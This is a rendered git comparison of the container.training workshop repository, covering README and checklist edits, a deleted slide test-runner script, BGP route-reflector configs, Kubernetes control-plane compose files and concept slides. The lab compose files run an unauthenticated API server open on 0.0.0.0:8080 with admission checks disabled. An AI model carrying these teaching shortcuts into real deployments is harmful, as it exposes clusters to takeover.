mirror of https://github.com/jpetazzo/container.training.git (synced 2026-02-15 18:19:56 +00:00)
Compare commits: 2017-10-16 ... gitpod (1429 commits)
.gitignore (vendored, 25 lines changed)
@@ -1,9 +1,24 @@
```gitignore
*.pyc
*.swp
*~
prepare-vms/ips.txt
prepare-vms/ips.html
prepare-vms/ips.pdf
prepare-vms/settings.yaml
prepare-vms/tags
docs/*.yml.html
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
node_modules

### macOS ###
# General
.DS_Store
.AppleDouble
.LSOverride

### Windows ###
# Windows thumbnail cache files
Thumbs.db
ehthumbs.db
ehthumbs_vista.db
```
.gitpod.yml (new file, 1 line)
@@ -0,0 +1 @@
```yaml
image: jpetazzo/shpod
```
CHECKLIST.md (new file, 24 lines)
@@ -0,0 +1,24 @@
Checklist to use when delivering a workshop

Authored by Jérôme; additions by Bridget

- [ ] Create event-named branch (such as `conferenceYYYY`) in the [main repo](https://github.com/jpetazzo/container.training/)
- [ ] Create file `slides/_redirects` containing a link to the desired tutorial: `/ /kube-halfday.yml.html 200`
- [ ] Push local branch to GitHub and merge into main repo
- [ ] [Netlify setup](https://app.netlify.com/sites/container-training/settings/domain): create subdomain for event-named branch
- [ ] Add link to event-named branch to [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] Update the slides that say which versions we are using for [kube](https://github.com/jpetazzo/container.training/blob/master/slides/kube/versions-k8s.md) or [swarm](https://github.com/jpetazzo/container.training/blob/master/slides/swarm/versions.md) workshops
- [ ] Update the version of Compose and Machine in [settings](https://github.com/jpetazzo/container.training/tree/master/prepare-vms/settings)
- [ ] (optional) Create chatroom
- [ ] (optional) Set chatroom in YML ([kube half-day example](https://github.com/jpetazzo/container.training/blob/master/slides/kube-halfday.yml#L6-L8)) and deploy
- [ ] (optional) Put chat link on [container.training front page](https://github.com/jpetazzo/container.training/blob/master/slides/index.html)
- [ ] How many VMs do we need? Check with event organizers ahead of time
- [ ] Provision VMs (slightly more than we think we'll need)
- [ ] Change password on presenter's VMs (to forestall any hijinx)
- [ ] Onsite: walk the room to count seats, check power supplies, lectern, A/V setup
- [ ] Print cards
- [ ] Cut cards
- [ ] Last-minute merge from master
- [ ] Check that all looks good
- [ ] DELIVER!
- [ ] Shut down VMs
- [ ] Update index.html to remove chat link and move session to past things
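The first few checklist items boil down to a handful of git commands; here is a sketch, using a hypothetical event branch name:

```bash
# Hypothetical event branch for a 2020 conference:
git checkout -b conference2020
echo "/ /kube-halfday.yml.html 200" > slides/_redirects
git add slides/_redirects
git commit -m "Add redirect for conference2020"
git push -u origin conference2020
```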
LICENSE (19 lines changed)
@@ -1,13 +1,12 @@
Copyright 2015 Jérôme Petazzoni

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
The code in this repository is licensed under the Apache License
Version 2.0. You may obtain a copy of this license at:

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
The instructions and slides in this repository (e.g. the files
with extension .md and .yml in the "slides" subdirectory) are
under the Creative Commons Attribution 4.0 International Public
License. You may obtain a copy of this license at:

https://creativecommons.org/licenses/by/4.0/legalcode
README.md (276 lines changed)
@@ -1,12 +1,106 @@
# Docker Orchestration Workshop
# Container Training

This is the material (slides, scripts, demo app, and other
code samples) for the "Docker orchestration workshop"
written and delivered by Jérôme Petazzoni (and lots of others)
non-stop since June 2015.
This repository (formerly known as `orchestration-workshop`)
contains materials (slides, scripts, demo app, and other
code samples) used for various workshops, tutorials, and
training sessions around the themes of Docker, containers,
and orchestration.

For the moment, it includes:

- Introduction to Docker and Containers,
- Container Orchestration with Docker Swarm,
- Container Orchestration with Kubernetes.

These materials have been designed around the following
principles:

- they assume very little prior knowledge of Docker,
  containers, or a particular programming language;
- they can be used in a classroom setup (with an
  instructor), or self-paced at home;
- they are hands-on, meaning that they contain lots
  of examples and exercises that you can easily
  reproduce;
- they progressively introduce concepts in chapters
  that build on top of each other.

If you're looking for the materials, you can stop reading
right now, and hop to http://container.training/, which
hosts all the slide decks available.

The rest of this document explains how this repository
is structured, and how to use it to deliver (or create)
your own tutorials.


## Content
## Why a single repository?

All these materials have been gathered in a single repository
because they have a few things in common:

- some [shared slides](slides/shared/) that are re-used
  (and updated) identically between different decks;
- a [build system](slides/) generating HTML slides from
  Markdown source files;
- a [semi-automated test harness](slides/autopilot/) to check
  that the exercises and examples provided work properly;
- a [PhantomJS script](slides/slidechecker.js) to check
  that the slides look good and don't have formatting issues;
- [deployment scripts](prepare-vms/) to start training
  VMs in bulk;
- a fancy pipeline powered by
  [Netlify](https://www.netlify.com/) and continuously
  deploying `master` to http://container.training/.


## What are the different courses available?

**Introduction to Docker** is derived from the first
"Docker Fundamentals" training materials. For more information,
see [jpetazzo/intro-to-docker](https://github.com/jpetazzo/intro-to-docker).
The version in this repository has been adapted to the Markdown
publishing pipeline. It is still maintained, but only receives
minor updates once in a while.

**Container Orchestration with Docker Swarm** (formerly
known as "Orchestration Workshop") is a workshop created by Jérôme
Petazzoni in June 2015. Since then, it has been continuously updated
and improved, and received contributions from many other authors.
It is actively maintained.

**Container Orchestration with Kubernetes** was created by
Jérôme Petazzoni in October 2017, with help and feedback from
a few other contributors. It is actively maintained.


## Repository structure

- [bin](bin/)
  - A few helper scripts that you can safely ignore for now.
- [dockercoins](dockercoins/)
  - The demo app used throughout the orchestration workshops.
- [efk](efk/), [elk](elk/), [prom](prom/), [snap](snap/):
  - Logging and metrics stacks used in the later parts of
    the orchestration workshops.
- [prepare-local](prepare-local/), [prepare-machine](prepare-machine/):
  - Contributed scripts to automate the creation of local environments.
    These could use some help to test/check that they work.
- [prepare-vms](prepare-vms/):
  - Scripts to automate the creation of AWS instances for students.
    These are routinely used and actively maintained.
- [slides](slides/):
  - All the slides! They are assembled from Markdown files with
    a custom Python script, and then rendered using [gnab/remark](
    https://github.com/gnab/remark). Check this directory for more details.
- [stacks](stacks/):
  - A handful of Compose files (version 3) that make it easy to
    deploy complex application stacks.


## Course structure

(This applies only to the orchestration workshops.)

The workshop introduces a demo app, "DockerCoins," built
around a micro-services architecture. First, we run it
@@ -31,104 +125,10 @@ to a YAML manifest. This allows to re-use content
between different workshops very easily.


## Quick start (or, "I want to try it!")
### DockerCoins

This workshop is designed to be *hands on*, i.e. to give you a step-by-step
guide where you will build your own Docker cluster, and use it to deploy
a sample application.

The easiest way to follow the workshop is to attend it when it is delivered
by an instructor. In that case, the instructor will generally give you
credentials (IP addresses, login, password) to connect to your own cluster
of virtual machines; and the [slides](http://jpetazzo.github.io/orchestration-workshop)
assume that you have your own cluster indeed.

If you want to follow the workshop on your own, and want to have your
own cluster, we have multiple solutions for you!


### Using [play-with-docker](http://play-with-docker.com/)

This method is very easy to get started: you don't need any extra account
or resources! It works only for the SwarmKit version of the workshop, though.

To get started, go to [play-with-docker](http://play-with-docker.com/), and
click on _ADD NEW INSTANCE_ five times. You will get five "docker-in-docker"
containers, all on a private network. These are your five nodes for the workshop!

When the instructions in the slides tell you to "SSH on node X", just go to
the tab corresponding to that node.

The nodes are not directly reachable from outside; so when the slides tell
you to "connect to the IP address of your node on port XYZ" you will have
to use a different method: click on the port number that should appear on
top of the play-with-docker window. This only works for HTTP services,
though.

Note that the instances provided by Play-With-Docker have a short lifespan
(a few hours only), so if you want to do the workshop over multiple sessions,
you will have to start over each time ... Or create your own cluster with
one of the methods described below.


### Using Docker Machine to create your own cluster

This method requires a bit more work to get started, but you get a permanent
cluster, with fewer limitations.

You will need Docker Machine (if you have Docker Mac, Docker Windows, or
the Docker Toolbox, you're all set already). You will also need:

- credentials for a cloud provider (e.g. API keys or tokens),
- or a local install of VirtualBox or VMware (or anything supported
  by Docker Machine).

Full instructions are in the [prepare-machine](prepare-machine) subdirectory.


### Using our scripts to mass-create a bunch of clusters

Since we often deliver the workshop during conferences or similar events,
we have scripts to automate the creation of a bunch of clusters using
AWS EC2. If you want to create multiple clusters and have EC2 credits,
check the [prepare-vms](prepare-vms) directory for more information.


## How This Repo is Organized

- **dockercoins**
  - Sample App: compose files and source code for the dockercoins sample apps
    used throughout the workshop
- **docs**
  - Slide Deck: presentation slide deck, works out-of-box with GitHub Pages,
    uses https://remarkjs.com
- **prepare-local**
  - untested scripts for automating the creation of local virtualbox VM's
    (could use your help validating)
- **prepare-machine**
  - instructions explaining how to use Docker Machine to create VMs
- **prepare-vms**
  - scripts for automating the creation of AWS instances for students


## Slide Deck

- The slides are in the `docs` directory.
- For each slide deck, there is a `.yml` file referencing `.md` files.
- The `.md` files contain Markdown snippets.
- When you run `build.sh once`, it will "compile" all the `.yml` files
  into `.yml.html` files that you can open in your browser.
- You can also run `build.sh forever`, which will watch the directory
  and rebuild slides automatically when files are modified.
- If needed, you can fine-tune `workshop.css` and `workshop.html`
  (respectively the CSS style used, and the boilerplate template).
- The slides use https://remarkjs.com to render Markdown into HTML in
  a web browser.
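A typical editing loop, as a sketch (assuming you run the commands from the directory holding `build.sh` and the `.yml` deck files):

```bash
# One-shot build: compile every .yml deck into a .yml.html file.
./build.sh once

# Or watch the directory and rebuild automatically whenever a file changes:
./build.sh forever
```

Open the resulting `.yml.html` files in a browser to preview the deck.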
## Sample App: Dockercoins!
The sample app is in the `dockercoins` directory. It's used during all chapters
The sample app is in the `dockercoins` directory.
It's used during all chapters
for explaining different concepts of orchestration.

To see it in action:
@@ -138,13 +138,18 @@ To see it in action:
- the web UI will be available on port 8000
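A minimal sketch of trying it locally (assuming a standard Compose file in the `dockercoins` directory, and the docker-compose v1 CLI):

```bash
git clone https://github.com/jpetazzo/container.training
cd container.training/dockercoins
docker-compose up -d    # start hasher, rng, webui, worker, and redis
# the web UI should now answer on http://localhost:8000
```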
*If you just want to run the workshop for yourself, you can stop reading
here. If you want to deliver the workshop for others (i.e. if you
want to become an instructor), keep reading!*


## Running the Workshop

If you want to deliver one of these workshops yourself,
this section is for you!

> *This section has been mostly contributed by
> [Bret Fisher](https://twitter.com/bretfisher), who was
> one of the first persons to have the bravery of delivering
> this workshop without me. Thanks Bret! 🍻
>
> Jérôme.*


### General timeline of planning a workshop
@@ -152,7 +157,7 @@ want to become an instructor), keep reading!*
understand the different `dockercoins` repos and the steps we go through to
get to a full Swarm Mode cluster of many containers. You'll update the first
few slides and last slide at a minimum, with your info.
- Your docs directory can use GitHub Pages.
- ~~Your docs directory can use GitHub Pages.~~
- This workshop expects 5 servers per student. You can get away with as few
  as 2 servers per student, but you'll need to change the slide deck to
  accommodate. More servers = more fun.
@@ -185,6 +190,7 @@ want to become an instructor), keep reading!*
- Remember you'll need to print the "cards" for students, so you'll need to
  create instances while you have a way to print them.


### Things That Could Go Wrong

- Creating AWS instances ahead of time, and you hit its limits in region and
@@ -193,11 +199,12 @@ want to become an instructor), keep reading!*
locked-down computer, host firewall, etc.
- Horrible wifi, or ssh port TCP/22 not open on network! If wifi sucks you
  can try using MOSH https://mosh.org which handles SSH over UDP. TMUX can also
prevent you from loosing your place if you get disconnected from servers.
prevent you from losing your place if you get disconnected from servers.
  https://tmux.github.io
- Forget to print "cards" and cut them up for handing out IP's.
- Forget to have fun and focus on your students!


### Creating the VMs

`prepare-vms/workshopctl` is the script that gets you most of what you need for
@@ -205,6 +212,7 @@ setting up instances. See
[prepare-vms/README.md](prepare-vms)
for all the info on tools and scripts.


### Content for Different Workshop Durations

With all the slides, this workshop is a full day long. If you need to deliver
@@ -213,6 +221,7 @@ can replace `---` with `???` which will hide slides. Or leave them there and
can replace `---` with `???` which will hide slides. Or leave them there and
add something like `(EXTRA CREDIT)` to the title so students can still view the
content but you also know to skip during presentation.


#### 3 Hour Version

- Limit time on debug tools, maybe skip a few. *"Chapter 1:
@@ -224,6 +233,7 @@ content but you also know to skip during presentation.
- Mention what DAB's are, but make this part optional in case you run out
  of time


#### 2 Hour Version

- Skip all the above, and:
@@ -237,6 +247,17 @@ content but you also know to skip during presentation.
- Last 15-30 minutes is for stateful services, DAB files, and questions.


### Pre-built images

There are pre-built images for the 4 components of the DockerCoins demo app: `dockercoins/hasher:v0.1`, `dockercoins/rng:v0.1`, `dockercoins/webui:v0.1`, and `dockercoins/worker:v0.1`. They correspond to the code in this repository.

There are also three variants, for demo purposes:

- `dockercoins/rng:v0.2` is broken (the server won't even start),
- `dockercoins/webui:v0.2` has bigger font on the Y axis and a green graph (instead of blue),
- `dockercoins/worker:v0.2` is 11x slower than `v0.1`.
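These variants are handy for demonstrating rolling updates and rollbacks. A sketch, assuming DockerCoins is already deployed on a Swarm and the service is named `worker` (adjust the name to match your stack):

```bash
# Roll out the deliberately slow variant and watch the mining rate drop:
docker service update --image dockercoins/worker:v0.2 worker

# Then undo the damage:
docker service update --rollback worker
```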
## Past events
Since its inception, this workshop has been delivered dozens of times,
@@ -268,13 +289,34 @@ If there is a bug and you can't fix it, but you can
reproduce it: submit an issue explaining how to reproduce.

If there is a bug and you can't even reproduce it:
sorry. It is probably an Heisenbug. I can't act on it
until it's reproducible.
sorry. It is probably an Heisenbug. We can't act on it
until it's reproducible, alas.

if you have attended this workshop and have feedback,
or if you want us to deliver that workshop at your
conference or for your company: contact me (jerome
at docker dot com).

Thank you!
# “Please teach us!”

If you have attended one of these workshops, and want
your team or organization to attend a similar one, you
can look at the list of upcoming events on
http://container.training/.

You are also welcome to reuse these materials to run
your own workshop, for your team or even at a meetup
or conference. In that case, you might enjoy watching
[Bridget Kromhout's talk at KubeCon 2018 Europe](
https://www.youtube.com/watch?v=mYsp_cGY2O0), explaining
precisely how to run such a workshop yourself.

Finally, you can also contact the following persons,
who are experienced speakers, are familiar with the
material, and are available to deliver these workshops
at your conference or for your company:

- jerome dot petazzoni at gmail dot com
- bret at bretfisher dot com

(If you are willing and able to deliver such workshops,
feel free to submit a PR to add your name to that list!)

**Thank you!**
(deleted file, 191 lines)
@@ -1,191 +0,0 @@
````python
#!/usr/bin/env python

import os
import re
import signal
import subprocess
import time

def print_snippet(snippet):
    print(78*'-')
    print(snippet)
    print(78*'-')

class Snippet(object):

    def __init__(self, slide, content):
        self.slide = slide
        self.content = content
        self.actions = []

    def __str__(self):
        return self.content


class Slide(object):

    current_slide = 0

    def __init__(self, content):
        Slide.current_slide += 1
        self.number = Slide.current_slide
        # Remove commented-out slides
        # (remark.js considers ??? to be the separator for speaker notes)
        content = re.split("\n\?\?\?\n", content)[0]
        self.content = content
        self.snippets = []
        exercises = re.findall("\.exercise\[(.*)\]", content, re.DOTALL)
        for exercise in exercises:
            if "```" in exercise and "<br/>`" in exercise:
                print("! Exercise on slide {} has both ``` and <br/>` delimiters, skipping."
                      .format(self.number))
                print_snippet(exercise)
            elif "```" in exercise:
                for snippet in exercise.split("```")[1::2]:
                    self.snippets.append(Snippet(self, snippet))
            elif "<br/>`" in exercise:
                for snippet in re.findall("<br/>`(.*)`", exercise):
                    self.snippets.append(Snippet(self, snippet))
            else:
                print(" Exercise on slide {} has neither ``` or <br/>` delimiters, skipping."
                      .format(self.number))

    def __str__(self):
        text = self.content
        for snippet in self.snippets:
            text = text.replace(snippet.content, ansi("7")(snippet.content))
        return text


def ansi(code):
    return lambda s: "\x1b[{}m{}\x1b[0m".format(code, s)

slides = []
with open("index.html") as f:
    content = f.read()
    for slide in re.split("\n---?\n", content):
        slides.append(Slide(slide))

is_editing_file = False
placeholders = {}
for slide in slides:
    for snippet in slide.snippets:
        content = snippet.content
        # Multi-line snippets should be ```highlightsyntax...
        # Single-line snippets will be interpreted as shell commands
        if '\n' in content:
            highlight, content = content.split('\n', 1)
        else:
            highlight = "bash"
        content = content.strip()
        # If the previous snippet was a file fragment, and the current
        # snippet is not YAML or EDIT, complain.
        if is_editing_file and highlight not in ["yaml", "edit"]:
            print("! On slide {}, previous snippet was YAML, so what do what do?"
                  .format(slide.number))
            print_snippet(content)
        is_editing_file = False
        if highlight == "yaml":
            is_editing_file = True
        elif highlight == "placeholder":
            for line in content.split('\n'):
                variable, value = line.split(' ', 1)
                placeholders[variable] = value
        elif highlight == "bash":
            for variable, value in placeholders.items():
                quoted = "`{}`".format(variable)
                if quoted in content:
                    content = content.replace(quoted, value)
                    del placeholders[variable]
            if '`' in content:
                print("! The following snippet on slide {} contains a backtick:"
                      .format(slide.number))
                print_snippet(content)
                continue
            print("_ "+content)
            snippet.actions.append((highlight, content))
        elif highlight == "edit":
            print(". "+content)
            snippet.actions.append((highlight, content))
        elif highlight == "meta":
            print("^ "+content)
            snippet.actions.append((highlight, content))
        else:
            print("! Unknown highlight {!r} on slide {}.".format(highlight, slide.number))
if placeholders:
    print("! Remaining placeholder values: {}".format(placeholders))

actions = sum([snippet.actions for snippet in sum([slide.snippets for slide in slides], [])], [])

# Strip ^{ ... ^} for now
def strip_curly_braces(actions, in_braces=False):
    if actions == []:
        return []
    elif actions[0] == ("meta", "^{"):
        return strip_curly_braces(actions[1:], True)
    elif actions[0] == ("meta", "^}"):
        return strip_curly_braces(actions[1:], False)
    elif in_braces:
        return strip_curly_braces(actions[1:], True)
    else:
        return [actions[0]] + strip_curly_braces(actions[1:], False)

actions = strip_curly_braces(actions)

background = []
cwd = os.path.expanduser("~")
env = {}
for current_action, next_action in zip(actions, actions[1:]+[("bash", "true")]):
    if current_action[0] == "meta":
        continue
    print(ansi(7)(">>> {}".format(current_action[1])))
    time.sleep(1)
    popen_options = dict(shell=True, cwd=cwd, stdin=subprocess.PIPE, preexec_fn=os.setpgrp)
    # The follow hack allows to capture the environment variables set by `docker-machine env`
    # FIXME: this doesn't handle `unset` for now
    if any([
        "eval $(docker-machine env" in current_action[1],
        "DOCKER_HOST" in current_action[1],
        "COMPOSE_FILE" in current_action[1],
    ]):
        popen_options["stdout"] = subprocess.PIPE
        current_action[1] += "\nenv"
    proc = subprocess.Popen(current_action[1], **popen_options)
    proc.cmd = current_action[1]
    if next_action[0] == "meta":
        print(">>> {}".format(next_action[1]))
        time.sleep(3)
        if next_action[1] == "^C":
            os.killpg(proc.pid, signal.SIGINT)
            proc.wait()
        elif next_action[1] == "^Z":
            # Let the process run
            background.append(proc)
        elif next_action[1] == "^D":
            proc.communicate()
            proc.wait()
        else:
            print("! Unknown meta action {} after snippet:".format(next_action[1]))
            print_snippet(next_action[1])
        print(ansi(7)("<<< {}".format(current_action[1])))
    else:
        proc.wait()
        if "stdout" in popen_options:
            stdout, stderr = proc.communicate()
            for line in stdout.split('\n'):
                if line.startswith("DOCKER_"):
                    variable, value = line.split('=', 1)
                    env[variable] = value
                    print("=== {}={}".format(variable, value))
        print(ansi(7)("<<< {} >>> {}".format(proc.returncode, current_action[1])))
        if proc.returncode != 0:
            print("Got non-zero status code; aborting.")
            break
    if current_action[1].startswith("cd "):
        cwd = os.path.expanduser(current_action[1][3:])
for proc in background:
    print("Terminating background process:")
    print_snippet(proc.cmd)
    proc.terminate()
    proc.wait()
````
(deleted file, 1 line)
@@ -1 +0,0 @@
```
../www/htdocs/index.html
```
compose/frr-route-reflector/conf/bgpd.conf (new file, 9 lines)
@@ -0,0 +1,9 @@
```
hostname frr
router bgp 64512
network 1.0.0.2/32
bgp log-neighbor-changes
neighbor kube peer-group
neighbor kube remote-as 64512
neighbor kube route-reflector-client
bgp listen range 0.0.0.0/0 peer-group kube
log stdout
```
compose/frr-route-reflector/conf/vtysh.conf (new file, empty)
compose/frr-route-reflector/conf/zebra.conf (new file, 2 lines)
@@ -0,0 +1,2 @@
```
hostname frr
log stdout
```
compose/frr-route-reflector/docker-compose.yaml (new file, 34 lines)
@@ -0,0 +1,34 @@
```yaml
version: "3"

services:
  bgpd:
    image: ajones17/frr:662
    volumes:
      - ./conf:/etc/frr
      - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
    restart: always

  zebra:
    image: ajones17/frr:662
    volumes:
      - ./conf:/etc/frr
      - ./run:/var/run/frr
    network_mode: host
    entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
    restart: always

  vtysh:
    image: ajones17/frr:662
    volumes:
      - ./conf:/etc/frr
      - ./run:/var/run/frr
    network_mode: host
    entrypoint: vtysh -c "show ip bgp"

  chmod:
    image: alpine
    volumes:
      - ./run:/var/run/frr
    command: chmod 777 /var/run/frr
```
29
compose/kube-router-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,29 @@
version: "3"

services:

  pause:
    ports:
    - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.4.3
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
    "Edit the CLUSTER placeholder first. Then, remove this line.":

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-scheduler --master http://localhost:8080
128
compose/kube-router-k8s-control-plane/kuberouter.yaml
Normal file
@@ -0,0 +1,128 @@
---
apiVersion: |+

  Make sure you update the line with --master=http://X.X.X.X:8080 below.
  Then remove this section from this YAML file and try again.

---
apiVersion: v1
kind: ConfigMap
metadata:
  name: kube-router-cfg
  namespace: kube-system
  labels:
    k8s-app: kube-router
data:
  cni-conf.json: |
    {
      "cniVersion":"0.3.0",
      "name":"mynet",
      "plugins":[
        {
          "name":"kubernetes",
          "type":"bridge",
          "bridge":"kube-bridge",
          "isDefaultGateway":true,
          "ipam":{
            "type":"host-local"
          }
        }
      ]
    }
---
apiVersion: apps/v1
kind: DaemonSet
metadata:
  labels:
    k8s-app: kube-router
  name: kube-router
  namespace: kube-system
spec:
  selector:
    matchLabels:
      k8s-app: kube-router
  template:
    metadata:
      labels:
        k8s-app: kube-router
      annotations:
        scheduler.alpha.kubernetes.io/critical-pod: ''
    spec:
      serviceAccountName: kube-router
      containers:
      - name: kube-router
        image: docker.io/cloudnativelabs/kube-router
        imagePullPolicy: Always
        args:
        - "--run-router=true"
        - "--run-firewall=true"
        - "--run-service-proxy=true"
        - "--master=http://X.X.X.X:8080"
        env:
        - name: NODE_NAME
          valueFrom:
            fieldRef:
              fieldPath: spec.nodeName
        - name: KUBE_ROUTER_CNI_CONF_FILE
          value: /etc/cni/net.d/10-kuberouter.conflist
        livenessProbe:
          httpGet:
            path: /healthz
            port: 20244
          initialDelaySeconds: 10
          periodSeconds: 3
        resources:
          requests:
            cpu: 250m
            memory: 250Mi
        securityContext:
          privileged: true
        volumeMounts:
        - name: lib-modules
          mountPath: /lib/modules
          readOnly: true
        - name: cni-conf-dir
          mountPath: /etc/cni/net.d
      initContainers:
      - name: install-cni
        image: busybox
        imagePullPolicy: Always
        command:
        - /bin/sh
        - -c
        - set -e -x;
          if [ ! -f /etc/cni/net.d/10-kuberouter.conflist ]; then
            if [ -f /etc/cni/net.d/*.conf ]; then
              rm -f /etc/cni/net.d/*.conf;
            fi;
            TMP=/etc/cni/net.d/.tmp-kuberouter-cfg;
            cp /etc/kube-router/cni-conf.json ${TMP};
            mv ${TMP} /etc/cni/net.d/10-kuberouter.conflist;
          fi
        volumeMounts:
        - mountPath: /etc/cni/net.d
          name: cni-conf-dir
        - mountPath: /etc/kube-router
          name: kube-router-cfg
      hostNetwork: true
      tolerations:
      - key: CriticalAddonsOnly
        operator: Exists
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
        operator: Exists
      - effect: NoSchedule
        key: node.kubernetes.io/not-ready
        operator: Exists
      volumes:
      - name: lib-modules
        hostPath:
          path: /lib/modules
      - name: cni-conf-dir
        hostPath:
          path: /etc/cni/net.d
      - name: kube-router-cfg
        configMap:
          name: kube-router-cfg
28
compose/simple-k8s-control-plane/docker-compose.yaml
Normal file
@@ -0,0 +1,28 @@
version: "3"

services:

  pause:
    ports:
    - 8080:8080
    image: k8s.gcr.io/pause

  etcd:
    network_mode: "service:pause"
    image: k8s.gcr.io/etcd:3.4.3
    command: etcd

  kube-apiserver:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount

  kube-controller-manager:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-controller-manager --master http://localhost:8080

  kube-scheduler:
    network_mode: "service:pause"
    image: k8s.gcr.io/hyperkube:v1.17.2
    command: kube-scheduler --master http://localhost:8080
@@ -5,6 +5,3 @@ RUN gem install thin
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80
HEALTHCHECK \
  --interval=1s --timeout=2s --retries=3 --start-period=1s \
  CMD curl http://localhost/ || exit 1
@@ -28,5 +28,5 @@ def rng(how_many_bytes):


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=80)
    app.run(host="0.0.0.0", port=80, threaded=False)
@@ -1,9 +0,0 @@
<html>
<!-- Generated with index.html.sh -->
<head>
<meta http-equiv="refresh" content="0; URL='https://dockercommunity.slack.com/messages/docker-mentor'" />
</head>
<body>
<a href="https://dockercommunity.slack.com/messages/docker-mentor">https://dockercommunity.slack.com/messages/docker-mentor</a>
</body>
</html>
@@ -1,16 +0,0 @@
#!/bin/sh
#LINK=https://gitter.im/jpetazzo/workshop-20170322-sanjose
LINK=https://dockercommunity.slack.com/messages/docker-mentor
#LINK=https://usenix-lisa.slack.com/messages/docker
sed "s,@@LINK@@,$LINK,g" >index.html <<EOF
<html>
<!-- Generated with index.html.sh -->
<head>
<meta http-equiv="refresh" content="0; URL='$LINK'" />
</head>
<body>
<a href="$LINK">$LINK</a>
</body>
</html>
EOF
@@ -1,283 +0,0 @@
# Kubernetes concepts

- Kubernetes is a container management system

- It runs and manages containerized applications on a cluster

--

- What does that really mean?

---

## Basic things we can ask Kubernetes to do

--

- Start 5 containers using image `atseashop/api:v1.3`

--

- Place an internal load balancer in front of these containers

--

- Start 10 containers using image `atseashop/webfront:v1.3`

--

- Place a public load balancer in front of these containers

--

- It's Black Friday (or Christmas), traffic spikes, grow our cluster and add containers

--

- New release! Replace my containers with the new image `atseashop/webfront:v1.4`

--

- Keep processing requests during the upgrade; update my containers one at a time

---

## Other things that Kubernetes can do for us

- Basic autoscaling

- Blue/green deployment, canary deployment

- Long running services, but also batch (one-off) jobs

- Overcommit our cluster and *evict* low-priority jobs

- Run services with *stateful* data (databases etc.)

- Fine-grained access control defining *what* can be done by *whom* on *which* resources

- Integrating third party services (*service catalog*)

- Automating complex tasks (*operators*)

---

## Kubernetes architecture

---

class: pic

<!-- image: complex Kubernetes architecture schema -->

---

## Kubernetes architecture

- Ha ha ha ha

- OK, I was trying to scare you, it's much simpler than that ❤️

---

class: pic

<!-- image: simplified Kubernetes architecture schema -->

---

## Credits

- The first schema is a Kubernetes cluster with storage backed by multi-path iSCSI

  (Courtesy of [Yongbok Kim](https://www.yongbok.net/blog/))

- The second one is a good simplified representation of a Kubernetes cluster

  (Courtesy of [Imesh Gunaratne](https://medium.com/containermind/a-reference-architecture-for-deploying-wso2-middleware-on-kubernetes-d4dee7601e8e))

---

## Kubernetes architecture: the master

- The Kubernetes logic (its "brains") is a collection of services:

  - the API server (our point of entry to everything!)
  - core services like the scheduler and controller manager
  - `etcd` (a highly available key/value store; the "database" of Kubernetes)

- Together, these services form what is called the "master"

- These services can run straight on a host, or in containers
  <br/>
  (that's an implementation detail)

- `etcd` can be run on separate machines (first schema) or co-located (second schema)

- We need at least one master, but we can have more (for high availability)

---

## Kubernetes architecture: the nodes

- The nodes executing our containers run another collection of services:

  - a container Engine (typically Docker)
  - kubelet (the "node agent")
  - kube-proxy (a necessary but not sufficient network component)

- Nodes were formerly called "minions"

- It is customary to *not* run apps on the node(s) running master components

  (Except when using small development clusters)

---

## Do we need to run Docker at all?

No!

--

- By default, Kubernetes uses the Docker Engine to run containers

- We could also use `rkt` ("Rocket") from CoreOS

- Or leverage other pluggable runtimes through the *Container Runtime Interface*

  (like CRI-O, or containerd)

---

## Do we need to run Docker at all?

Yes!

--

- In this workshop, we run our app on a single node first

- We will need to build images and ship them around

- We can do these things without Docker
  <br/>
  (and get diagnosed with NIH¹ syndrome)

- Docker is still the most stable container engine today
  <br/>
  (but other options are maturing very quickly)

.footnote[¹[Not Invented Here](https://en.wikipedia.org/wiki/Not_invented_here)]

---

## Do we need to run Docker at all?

- On our development environments, CI pipelines ... :

  *Yes, almost certainly*

- On our production servers:

  *Yes (today)*

  *Probably not (in the future)*

.footnote[More information about CRI [on the Kubernetes blog](http://blog.kubernetes.io/2016/12/container-runtime-interface-cri-in-kubernetes.html).]

---

## Kubernetes resources

- The Kubernetes API defines a lot of objects called *resources*

- These resources are organized by type, or `Kind` (in the API)

- A few common resource types are:

  - node (self-explanatory)
  - pod (group of containers running together on a node)
  - service (stable network endpoint to connect to one or multiple containers)
  - namespace (more-or-less isolated group of things)
  - secret (bundle of sensitive data to be passed to a container)

  And much more! (We can see the full list by running `kubectl get`)
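
To poke at a few of these types on a live cluster, one could try the commands below (a sketch; as noted above, running `kubectl get` with no arguments prints the list of valid resource types):

```bash
kubectl get            # prints the list of available resource types
kubectl get node       # then query one resource type at a time
kubectl get pod
kubectl get service
```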
---

# Declarative vs imperative

